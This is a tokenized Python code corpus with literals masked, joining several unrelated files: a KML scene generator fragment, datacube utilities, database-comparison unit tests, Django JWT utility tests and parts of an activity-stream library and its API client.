debug ( '<STR_LIT>' , tag_name ) <EOL> tag_node = kml_dom_tree . createElement ( tag_name ) <EOL> style_node . appendChild ( tag_node ) <EOL> for attribute_name in self . style_dict [ tag_name ] . keys ( ) : <EOL> attribute_nodes = self . getChildNodesByName ( tag_node , attribute_name ) <EOL> if attribute_nodes : <EOL> logger . 
debug ( '<STR_LIT>' , attribute_name ) <EOL> attribute_node = attribute_nodes [ <NUM_LIT:0> ] <EOL> text_node = attribute_node . childNodes [ <NUM_LIT:0> ] <EOL> text_node . data = str ( self . style_dict [ tag_name ] [ attribute_name ] ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' , attribute_name ) <EOL> attribute_node = kml_dom_tree . createElement ( attribute_name ) <EOL> tag_node . appendChild ( attribute_node ) <EOL> text_node = kml_dom_tree . createTextNode ( str ( self . style_dict [ tag_name ] [ attribute_name ] ) ) <EOL> attribute_node . appendChild ( text_node ) <EOL> self . db_cursor = self . db_connection . cursor ( ) <EOL> sql = """<STR_LIT>""" <EOL> params = { <EOL> '<STR_LIT>' : self . start_date , <EOL> '<STR_LIT>' : self . end_date , <EOL> '<STR_LIT>' : self . satellite , <EOL> '<STR_LIT>' : self . sensor <EOL> } <EOL> log_multiline ( logger . debug , self . db_cursor . mogrify ( sql , params ) , '<STR_LIT>' , '<STR_LIT:\t>' ) <EOL> self . db_cursor . execute ( sql , params ) <EOL> field_list = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:path>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> for record in self . db_cursor : <EOL> acquisition_info = { } <EOL> for field_index in range ( len ( field_list ) ) : <EOL> acquisition_info [ field_list [ field_index ] ] = record [ field_index ] <EOL> acquisition_info [ '<STR_LIT>' ] = acquisition_info [ '<STR_LIT>' ] . year <EOL> acquisition_info [ '<STR_LIT>' ] = acquisition_info [ '<STR_LIT>' ] . month <EOL> acquisition_info [ '<STR_LIT>' ] = self . thumbnail_size <EOL> acquisition_info [ '<STR_LIT>' ] = re . search ( '<STR_LIT>' , acquisition_info [ '<STR_LIT>' ] ) . group ( <NUM_LIT:0> ) <EOL> log_multiline ( logger . 
debug , acquisition_info , '<STR_LIT>' , '<STR_LIT:\t>' ) <EOL> placemark_node = create_placemark_node ( wrs_document_node , acquisition_info ) <EOL> kml_document_node . appendChild ( placemark_node ) <EOL> logger . info ( '<STR_LIT>' , kml_filename ) <EOL> write_xml_file ( kml_filename , kml_dom_tree ) <EOL> def main ( ) : <EOL> skg = SceneKMLGenerator ( ) <EOL> assert skg . output_file , '<STR_LIT>' <EOL> skg . generate ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import time <EOL> import datetime <EOL> import logging <EOL> import errno <EOL> import inspect <EOL> LOGGER = logging . getLogger ( __name__ ) <EOL> LOGGER . setLevel ( logging . INFO ) <EOL> def get_datacube_root ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> datacube_root = os . environ [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> this_file = inspect . getsourcefile ( get_datacube_root ) <EOL> datacube_root = os . path . dirname ( os . path . abspath ( this_file ) ) <EOL> return datacube_root <EOL> def parse_date_from_string ( date_string ) : <EOL> """<STR_LIT>""" <EOL> format_list = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> date = None <EOL> for date_format in format_list : <EOL> try : <EOL> date = datetime . datetime . strptime ( date_string , date_format ) . date ( ) <EOL> break <EOL> except ValueError : <EOL> pass <EOL> return date <EOL> def get_file_size_mb ( path ) : <EOL> """<STR_LIT>""" <EOL> return os . path . getsize ( path ) / ( <NUM_LIT> * <NUM_LIT> ) <EOL> def create_directory ( dirname ) : <EOL> """<STR_LIT>""" <EOL> old_umask = os . umask ( <NUM_LIT> ) <EOL> try : <EOL> os . makedirs ( dirname ) <EOL> except OSError , e : <EOL> if e . errno != errno . EEXIST or not os . path . isdir ( dirname ) : <EOL> raise DatasetError ( '<STR_LIT>' % dirname ) <EOL> finally : <EOL> os . umask ( old_umask ) <EOL> def synchronize ( sync_time ) : <EOL> """<STR_LIT>""" <EOL> if sync_time is None : <EOL> return <EOL> float_sync_time = float ( sync_time ) <EOL> while time . time ( ) < float_sync_time : <EOL> continue <EOL> class Stopwatch ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . elapsed_time = <NUM_LIT:0.0> <EOL> self . cpu_time = <NUM_LIT:0.0> <EOL> self . start_elapsed_time = None <EOL> self . start_cpu_time = None <EOL> self . running = False <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . running : <EOL> self . 
start_elapsed_time = time . time ( ) <EOL> self . start_cpu_time = time . clock ( ) <EOL> self . running = True <EOL> def stop ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . running : <EOL> self . elapsed_time += ( time . time ( ) - self . start_elapsed_time ) <EOL> self . cpu_time += ( time . clock ( ) - self . start_cpu_time ) <EOL> self . start_elapsed_time = None <EOL> self . start_cpu_time = None <EOL> self . running = False <EOL> def reset ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __init__ ( ) <EOL> def read ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . running : <EOL> curr_time = time . time ( ) <EOL> curr_clock = time . clock ( ) <EOL> self . elapsed_time += ( curr_time - self . start_elapsed_time ) <EOL> self . cpu_time += ( curr_clock - self . start_cpu_time ) <EOL> self . start_elapsed_time = curr_time <EOL> self . start_cpu_time = curr_clock <EOL> return ( self . elapsed_time , self . cpu_time ) <EOL> class DatasetError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class DatasetSkipError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import unittest <EOL> import StringIO <EOL> import dbutil <EOL> import dbcompare <EOL> MODULE = '<STR_LIT>' <EOL> class TestReporter ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> TEST_COLUMNS = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> TEST_ROWS = [ <EOL> ( <NUM_LIT:1> , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:4> , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:4> , '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> SUITE = '<STR_LIT>' <EOL> TEST_TABLE = '<STR_LIT>' <EOL> TEST_COLUMN = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> self . output = [ None ] * <NUM_LIT:4> <EOL> for i in range ( <NUM_LIT:4> ) : <EOL> self . output [ i ] = StringIO . StringIO ( ) <EOL> self . report = [ None ] * <NUM_LIT:4> <EOL> for i in range ( <NUM_LIT:4> ) : <EOL> self . report [ i ] = dbcompare . Reporter ( '<STR_LIT>' , '<STR_LIT>' , <EOL> i , self . output [ i ] ) <EOL> def check_output ( self , file_name , output_str ) : <EOL> """<STR_LIT>""" <EOL> output_dir_path = dbutil . output_directory ( MODULE , self . SUITE ) <EOL> output_file_path = os . path . join ( output_dir_path , file_name ) <EOL> with open ( output_file_path , '<STR_LIT:w>' ) as output_file : <EOL> output_file . write ( output_str ) <EOL> expected_dir_path = dbutil . expected_directory ( MODULE , self . SUITE ) <EOL> expected_file_path = os . path . join ( expected_dir_path , file_name ) <EOL> if os . path . isfile ( expected_file_path ) : <EOL> with open ( expected_file_path ) as expected_file : <EOL> expected_str = expected_file . read ( ) <EOL> self . assertEqual ( output_str , expected_str ) <EOL> else : <EOL> self . skipTest ( ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % <EOL> ( file_name , MODULE , self . SUITE ) ) <EOL> def test_table_only_in_v0 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:0> ] . table_only_in ( <NUM_LIT:1> , self . TEST_TABLE ) <EOL> self . assertEqual ( self . 
output [ <NUM_LIT:0> ] . getvalue ( ) , "<STR_LIT>" ) <EOL> def test_table_only_in_v1 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:1> ] . table_only_in ( <NUM_LIT:1> , self . TEST_TABLE ) <EOL> self . check_output ( '<STR_LIT>' , <EOL> self . output [ <NUM_LIT:1> ] . getvalue ( ) ) <EOL> def test_table_only_in_v2 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:2> ] . table_only_in ( <NUM_LIT:2> , self . TEST_TABLE ) <EOL> self . check_output ( '<STR_LIT>' , <EOL> self . output [ <NUM_LIT:2> ] . getvalue ( ) ) <EOL> def test_column_only_in_v0 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:0> ] . column_only_in ( <NUM_LIT:1> , self . TEST_TABLE , self . TEST_COLUMN ) <EOL> self . assertEqual ( self . output [ <NUM_LIT:0> ] . getvalue ( ) , "<STR_LIT>" ) <EOL> def test_column_only_in_v1 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:1> ] . column_only_in ( <NUM_LIT:2> , self . TEST_TABLE , self . TEST_COLUMN ) <EOL> self . check_output ( '<STR_LIT>' , <EOL> self . output [ <NUM_LIT:1> ] . getvalue ( ) ) <EOL> def test_column_only_in_v3 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:3> ] . column_only_in ( <NUM_LIT:1> , self . TEST_TABLE , self . TEST_COLUMN ) <EOL> self . check_output ( '<STR_LIT>' , <EOL> self . output [ <NUM_LIT:3> ] . getvalue ( ) ) <EOL> def test_primary_keys_differ_v0 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:0> ] . primary_keys_differ ( self . TEST_TABLE ) <EOL> self . assertEqual ( self . output [ <NUM_LIT:0> ] . getvalue ( ) , "<STR_LIT>" ) <EOL> def test_primary_keys_differ_v1 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:1> ] . primary_keys_differ ( self . TEST_TABLE ) <EOL> self . check_output ( '<STR_LIT>' , <EOL> self . output [ <NUM_LIT:1> ] . getvalue ( ) ) <EOL> def test_content_differences_v3 ( self ) : <EOL> "<STR_LIT>" <EOL> self . report [ <NUM_LIT:3> ] . new_table ( self . TEST_TABLE , self . TEST_COLUMNS ) <EOL> self . 
report [ <NUM_LIT:3> ] . add_difference ( <NUM_LIT:1> , self . TEST_ROWS [ <NUM_LIT:0> ] ) <EOL> self . report [ <NUM_LIT:3> ] . add_difference ( <NUM_LIT:2> , self . TEST_ROWS [ <NUM_LIT:1> ] ) <EOL> self . report [ <NUM_LIT:3> ] . add_difference ( <NUM_LIT:1> , self . TEST_ROWS [ <NUM_LIT:2> ] ) <EOL> self . report [ <NUM_LIT:3> ] . add_difference ( <NUM_LIT:2> , self . TEST_ROWS [ <NUM_LIT:3> ] ) <EOL> self . report [ <NUM_LIT:3> ] . content_differences ( ) <EOL> self . check_output ( '<STR_LIT>' , <EOL> self . output [ <NUM_LIT:3> ] . getvalue ( ) ) <EOL> class TestComparisonWrapper ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> SAVE_DIR = dbutil . input_directory ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> TEST_DB_FILE = "<STR_LIT>" <EOL> NOT_A_TABLE = "<STR_LIT>" <EOL> EXPECTED_TABLE_LIST = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> COLUMN_LIST_TABLE = "<STR_LIT>" <EOL> EXPECTED_COLUMN_LIST = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> SIMPLE_PKEY_TABLE = "<STR_LIT>" <EOL> EXPECTED_SIMPLE_PKEY = [ '<STR_LIT>' ] <EOL> COMPOUND_PKEY_TABLE = "<STR_LIT>" <EOL> EXPECTED_COMPOUND_PKEY = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> SREF_PKEY_TABLE = "<STR_LIT>" <EOL> EXPECTED_SREF_PKEY = [ '<STR_LIT>' ] <EOL> def setUp ( self ) : <EOL> self . conn = None <EOL> self . dbname = dbutil . random_name ( '<STR_LIT>' ) <EOL> dbutil . TESTSERVER . create ( self . dbname , self . SAVE_DIR , self . TEST_DB_FILE ) <EOL> self . conn = dbutil . TESTSERVER . connect ( self . dbname ) <EOL> self . conn = dbcompare . 
ComparisonWrapper ( self . conn ) <EOL> def test_table_exists ( self ) : <EOL> "<STR_LIT>" <EOL> self . assertTrue ( self . conn . table_exists ( self . EXPECTED_TABLE_LIST [ <NUM_LIT:0> ] ) , <EOL> "<STR_LIT>" % <EOL> self . EXPECTED_TABLE_LIST [ <NUM_LIT:0> ] ) <EOL> self . assertTrue ( self . conn . table_exists ( self . EXPECTED_TABLE_LIST [ - <NUM_LIT:1> ] ) , <EOL> "<STR_LIT>" % <EOL> self . EXPECTED_TABLE_LIST [ - <NUM_LIT:1> ] ) <EOL> self . assertTrue ( self . conn . table_exists ( self . EXPECTED_TABLE_LIST [ <NUM_LIT:5> ] ) , <EOL> "<STR_LIT>" % <EOL> self . EXPECTED_TABLE_LIST [ <NUM_LIT:5> ] ) <EOL> self . assertFalse ( self . conn . table_exists ( self . NOT_A_TABLE ) , <EOL> "<STR_LIT>" % <EOL> self . NOT_A_TABLE ) <EOL> def test_table_list ( self ) : <EOL> "<STR_LIT>" <EOL> tab_list = self . conn . table_list ( ) <EOL> self . assertEqual ( tab_list , self . EXPECTED_TABLE_LIST ) <EOL> def test_column_list ( self ) : <EOL> "<STR_LIT>" <EOL> col_list = self . conn . column_list ( self . COLUMN_LIST_TABLE ) <EOL> self . assertEqual ( col_list , self . EXPECTED_COLUMN_LIST ) <EOL> def test_primary_key_simple ( self ) : <EOL> "<STR_LIT>" <EOL> pkey = self . conn . primary_key ( self . SIMPLE_PKEY_TABLE ) <EOL> self . assertEqual ( pkey , self . EXPECTED_SIMPLE_PKEY ) <EOL> def test_primary_key_compound ( self ) : <EOL> "<STR_LIT>" <EOL> pkey = self . conn . primary_key ( self . COMPOUND_PKEY_TABLE ) <EOL> self . assertEqual ( pkey , self . EXPECTED_COMPOUND_PKEY ) <EOL> def test_primary_key_sref ( self ) : <EOL> "<STR_LIT>" <EOL> pkey = self . conn . primary_key ( self . SREF_PKEY_TABLE ) <EOL> self . assertEqual ( pkey , self . EXPECTED_SREF_PKEY ) <EOL> def tearDown ( self ) : <EOL> if self . conn : <EOL> self . conn . close ( ) <EOL> dbutil . TESTSERVER . drop ( self . dbname ) <EOL> class TestCompareFunctions ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> SUITE = '<STR_LIT>' <EOL> INPUT_DIR = dbutil . 
input_directory ( MODULE , SUITE ) <EOL> OUTPUT_DIR = dbutil . output_directory ( MODULE , SUITE ) <EOL> EXPECTED_DIR = dbutil . expected_directory ( MODULE , SUITE ) <EOL> VERSION = dbutil . version_or_user ( ) <EOL> DB_LIST = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> def setUp ( self ) : <EOL> self . db_count = len ( self . DB_LIST ) <EOL> self . conn = [ None ] * self . db_count <EOL> self . dbname = [ None ] * self . db_count <EOL> for i in range ( self . db_count ) : <EOL> self . dbname [ i ] = self . VERSION + "<STR_LIT>" + str ( i ) <EOL> if not dbutil . TESTSERVER . exists ( self . dbname [ i ] ) : <EOL> dbutil . TESTSERVER . create ( self . dbname [ i ] , <EOL> self . INPUT_DIR , <EOL> self . DB_LIST [ i ] ) <EOL> self . conn [ i ] = dbutil . TESTSERVER . connect ( self . dbname [ i ] ) <EOL> def test_compare_empty ( self ) : <EOL> "<STR_LIT>" <EOL> result = dbcompare . compare_databases ( self . conn [ <NUM_LIT:0> ] , self . conn [ <NUM_LIT:1> ] , <EOL> verbosity = <NUM_LIT:2> ) <EOL> self . assertTrue ( result , "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> def test_compare_equal_tables ( self ) : <EOL> "<STR_LIT>" <EOL> result = dbcompare . compare_tables ( self . conn [ <NUM_LIT:0> ] , self . conn [ <NUM_LIT:2> ] , <EOL> '<STR_LIT>' , verbosity = <NUM_LIT:2> ) <EOL> self . assertTrue ( result , "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> def test_compare_different ( self ) : <EOL> "<STR_LIT>" <EOL> file_name = '<STR_LIT>' <EOL> output = StringIO . StringIO ( ) <EOL> result = dbcompare . compare_databases ( self . conn [ <NUM_LIT:0> ] , self . conn [ <NUM_LIT:2> ] , <EOL> verbosity = <NUM_LIT:3> , output = output ) <EOL> output_file_path = os . path . join ( self . OUTPUT_DIR , file_name ) <EOL> with open ( output_file_path , '<STR_LIT:w>' ) as output_file : <EOL> output_file . write ( output . getvalue ( ) ) <EOL> self . assertFalse ( result , "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> expected_file_path = os . path . join ( self . 
EXPECTED_DIR , file_name ) <EOL> if os . path . isfile ( expected_file_path ) : <EOL> with open ( expected_file_path ) as expected_file : <EOL> expected_str = expected_file . read ( ) <EOL> self . assertEqual ( output . getvalue ( ) , expected_str ) <EOL> else : <EOL> self . skipTest ( "<STR_LIT>" ) <EOL> def test_compare_unequal_tables ( self ) : <EOL> "<STR_LIT>" <EOL> file_name = '<STR_LIT>' <EOL> output = StringIO . StringIO ( ) <EOL> result = dbcompare . compare_tables ( self . conn [ <NUM_LIT:0> ] , self . conn [ <NUM_LIT:2> ] , <EOL> '<STR_LIT>' , verbosity = <NUM_LIT:3> , <EOL> output = output ) <EOL> output_file_path = os . path . join ( self . OUTPUT_DIR , file_name ) <EOL> with open ( output_file_path , '<STR_LIT:w>' ) as output_file : <EOL> output_file . write ( output . getvalue ( ) ) <EOL> self . assertFalse ( result , "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> expected_file_path = os . path . join ( self . EXPECTED_DIR , file_name ) <EOL> if os . path . isfile ( expected_file_path ) : <EOL> with open ( expected_file_path ) as expected_file : <EOL> expected_str = expected_file . read ( ) <EOL> self . assertEqual ( output . getvalue ( ) , expected_str ) <EOL> else : <EOL> self . skipTest ( "<STR_LIT>" ) <EOL> def tearDown ( self ) : <EOL> for i in range ( self . db_count ) : <EOL> if self . conn [ i ] : <EOL> self . conn [ i ] . close ( ) <EOL> def the_suite ( ) : <EOL> """<STR_LIT>""" <EOL> test_classes = [ <EOL> TestReporter , <EOL> TestComparisonWrapper , <EOL> TestCompareFunctions <EOL> ] <EOL> suite_list = map ( unittest . defaultTestLoader . loadTestsFromTestCase , <EOL> test_classes ) <EOL> suite = unittest . TestSuite ( suite_list ) <EOL> return suite <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( the_suite ( ) ) </s>
<s> import json <EOL> import base64 <EOL> import pytest <EOL> import jwt . exceptions <EOL> from django . test import TestCase <EOL> from rest_framework_jwt import utils <EOL> from rest_framework_jwt . compat import get_user_model <EOL> from rest_framework_jwt . settings import api_settings , DEFAULTS <EOL> User = get_user_model ( ) <EOL> def base64url_decode ( input ) : <EOL> rem = len ( input ) % <NUM_LIT:4> <EOL> if rem > <NUM_LIT:0> : <EOL> input += b'<STR_LIT:=>' * ( <NUM_LIT:4> - rem ) <EOL> return base64 . urlsafe_b64decode ( input ) <EOL> class UtilsTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . username = '<STR_LIT>' <EOL> self . email = '<STR_LIT>' <EOL> self . user = User . objects . create_user ( self . username , self . email ) <EOL> def test_jwt_payload_handler ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> pytest . deprecated_call ( utils . jwt_payload_handler , self . user ) <EOL> self . assertTrue ( isinstance ( payload , dict ) ) <EOL> self . assertEqual ( payload [ '<STR_LIT>' ] , self . user . pk ) <EOL> self . assertEqual ( payload [ '<STR_LIT:email>' ] , self . email ) <EOL> self . assertEqual ( payload [ '<STR_LIT:username>' ] , self . username ) <EOL> self . assertTrue ( '<STR_LIT>' in payload ) <EOL> def test_jwt_encode ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> payload_data = base64url_decode ( token . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> ] . encode ( '<STR_LIT:utf-8>' ) ) <EOL> payload_from_token = json . loads ( payload_data . decode ( '<STR_LIT:utf-8>' ) ) <EOL> self . assertEqual ( payload_from_token , payload ) <EOL> def test_jwt_decode ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> decoded_payload = utils . jwt_decode_handler ( token ) <EOL> self . 
assertEqual ( decoded_payload , payload ) <EOL> def test_jwt_response_payload ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> response_data = utils . jwt_response_payload_handler ( token ) <EOL> self . assertEqual ( response_data , dict ( token = token ) ) <EOL> def test_jwt_decode_verify_exp ( self ) : <EOL> api_settings . JWT_VERIFY_EXPIRATION = False <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> payload [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> utils . jwt_decode_handler ( token ) <EOL> api_settings . JWT_VERIFY_EXPIRATION = True <EOL> class TestAudience ( TestCase ) : <EOL> def setUp ( self ) : <EOL> api_settings . JWT_AUDIENCE = '<STR_LIT>' <EOL> self . username = '<STR_LIT>' <EOL> self . email = '<STR_LIT>' <EOL> self . user = User . objects . create_user ( self . username , self . email ) <EOL> return super ( TestAudience , self ) . setUp ( ) <EOL> def test_fail_audience_missing ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> del payload [ '<STR_LIT>' ] <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> with self . assertRaises ( jwt . exceptions . MissingRequiredClaimError ) : <EOL> utils . jwt_decode_handler ( token ) <EOL> def test_fail_audience_wrong ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> payload [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> with self . assertRaises ( jwt . exceptions . InvalidAudienceError ) : <EOL> utils . jwt_decode_handler ( token ) <EOL> def test_correct_audience ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> decoded_payload = utils . jwt_decode_handler ( token ) <EOL> self . assertEqual ( decoded_payload , payload ) <EOL> def tearDown ( self ) : <EOL> api_settings . 
JWT_AUDIENCE = DEFAULTS [ '<STR_LIT>' ] <EOL> class TestIssuer ( TestCase ) : <EOL> def setUp ( self ) : <EOL> api_settings . JWT_ISSUER = '<STR_LIT>' <EOL> self . username = '<STR_LIT>' <EOL> self . email = '<STR_LIT>' <EOL> self . user = User . objects . create_user ( self . username , self . email ) <EOL> return super ( TestIssuer , self ) . setUp ( ) <EOL> def test_fail_issuer_missing ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> del payload [ '<STR_LIT>' ] <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> with self . assertRaises ( jwt . exceptions . MissingRequiredClaimError ) : <EOL> utils . jwt_decode_handler ( token ) <EOL> def test_fail_issuer_wrong ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> payload [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> with self . assertRaises ( jwt . exceptions . InvalidIssuerError ) : <EOL> utils . jwt_decode_handler ( token ) <EOL> def test_correct_issuer ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> decoded_payload = utils . jwt_decode_handler ( token ) <EOL> self . assertEqual ( decoded_payload , payload ) <EOL> def tearDown ( self ) : <EOL> api_settings . JWT_ISSUER = DEFAULTS [ '<STR_LIT>' ] </s>
<s> from django . db import models <EOL> from django . template . defaultfilters import slugify <EOL> from django . utils . timezone import is_aware <EOL> from django . utils . timezone import make_naive <EOL> import pytz <EOL> def model_content_type ( cls ) : <EOL> return '<STR_LIT>' % ( cls . _meta . app_label , cls . _meta . object_name ) <EOL> def create_reference ( reference ) : <EOL> if isinstance ( reference , ( models . Model , ) ) : <EOL> return create_model_reference ( reference ) <EOL> return reference <EOL> def create_model_reference ( model_instance ) : <EOL> '''<STR_LIT>''' <EOL> content_type = model_content_type ( model_instance . __class__ ) <EOL> content_id = model_instance . pk <EOL> return '<STR_LIT>' % ( content_type , content_id ) <EOL> class Activity ( object ) : <EOL> @ property <EOL> def activity_author_feed ( self ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> @ classmethod <EOL> def activity_related_models ( cls ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> @ property <EOL> def extra_activity_data ( self ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> @ property <EOL> def activity_actor_attr ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . user <EOL> @ property <EOL> def activity_object_attr ( self ) : <EOL> '''<STR_LIT>''' <EOL> raise NotImplementedError ( '<STR_LIT>' % self . __class__ . __name__ ) <EOL> @ property <EOL> def activity_actor_id ( self ) : <EOL> return self . activity_actor_attr . pk <EOL> @ property <EOL> def activity_actor ( self ) : <EOL> return create_reference ( self . activity_actor_attr ) <EOL> @ property <EOL> def activity_verb ( self ) : <EOL> model_name = slugify ( self . __class__ . __name__ ) <EOL> return model_name <EOL> @ property <EOL> def activity_object ( self ) : <EOL> return create_reference ( self . activity_object_attr ) <EOL> @ property <EOL> def activity_foreign_id ( self ) : <EOL> return self . activity_object <EOL> @ property <EOL> def activity_time ( self ) : <EOL> atime = self . 
created_at <EOL> if is_aware ( self . created_at ) : <EOL> atime = make_naive ( atime , pytz . utc ) <EOL> return atime <EOL> @ property <EOL> def activity_notify ( self ) : <EOL> pass <EOL> def create_activity ( self ) : <EOL> extra_data = self . extra_activity_data <EOL> if not extra_data : <EOL> extra_data = { } <EOL> to = self . activity_notify <EOL> if to : <EOL> extra_data [ '<STR_LIT:to>' ] = [ f . id for f in to ] <EOL> activity = dict ( <EOL> actor = self . activity_actor , <EOL> verb = self . activity_verb , <EOL> object = self . activity_object , <EOL> foreign_id = self . activity_foreign_id , <EOL> time = self . activity_time , <EOL> ** extra_data <EOL> ) <EOL> return activity </s>
<s> from datetime import datetime <EOL> import json <EOL> import logging <EOL> import os <EOL> from httpsig . requests_auth import HTTPSignatureAuth <EOL> import jwt <EOL> import requests <EOL> from requests . adapters import HTTPAdapter <EOL> from stream import exceptions , serializer <EOL> from stream . signing import sign <EOL> from stream . utils import validate_feed_slug , validate_user_id <EOL> from requests import Request <EOL> logger = logging . getLogger ( __name__ ) <EOL> class StreamClient ( object ) : <EOL> base_url = '<STR_LIT>' <EOL> def __init__ ( self , api_key , api_secret , app_id , version = '<STR_LIT>' , timeout = <NUM_LIT> , base_url = None , location = None ) : <EOL> '''<STR_LIT>''' <EOL> self . api_key = api_key <EOL> self . api_secret = api_secret <EOL> self . app_id = app_id <EOL> self . version = version <EOL> self . timeout = timeout <EOL> self . location = location <EOL> if os . environ . get ( '<STR_LIT>' ) : <EOL> self . base_url = '<STR_LIT>' <EOL> self . timeout = <NUM_LIT:20> <EOL> elif base_url is not None : <EOL> self . base_url = base_url <EOL> elif location is not None : <EOL> self . base_url = '<STR_LIT>' % location <EOL> self . base_analytics_url = '<STR_LIT>' <EOL> self . session = requests . Session ( ) <EOL> self . session . mount ( self . base_url , HTTPAdapter ( max_retries = <NUM_LIT:0> ) ) <EOL> self . auth = HTTPSignatureAuth ( api_key , secret = api_secret ) <EOL> def feed ( self , feed_slug , user_id ) : <EOL> '''<STR_LIT>''' <EOL> from stream . feed import Feed <EOL> feed_slug = validate_feed_slug ( feed_slug ) <EOL> user_id = validate_user_id ( user_id ) <EOL> feed_id = '<STR_LIT>' % ( feed_slug , user_id ) <EOL> token = sign ( self . api_secret , feed_id ) <EOL> return Feed ( self , feed_slug , user_id , token ) <EOL> def get_default_params ( self ) : <EOL> '''<STR_LIT>''' <EOL> params = dict ( api_key = self . 
